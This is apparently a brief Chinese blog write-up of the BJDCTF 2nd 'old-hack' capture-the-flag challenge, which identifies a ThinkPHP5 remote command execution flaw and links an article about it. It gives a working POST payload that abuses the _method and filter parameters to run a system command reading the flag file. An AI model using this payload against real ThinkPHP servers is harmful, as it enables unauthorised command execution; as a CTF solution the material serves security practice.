[BJDCTF 2nd]old-hack

题目提示是thinkphp5，直接搜索thinkphp5的漏洞

发现thinkphp5有远程命令执行漏洞，详细如下文章

https://www.freebuf.com/vuls/194105.html

payload:

_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

posted @ 2020-07-07 09:32 GTX690M 阅读(143) 评论(0) 编辑收藏举报

刷新页面返回顶部

GTX690M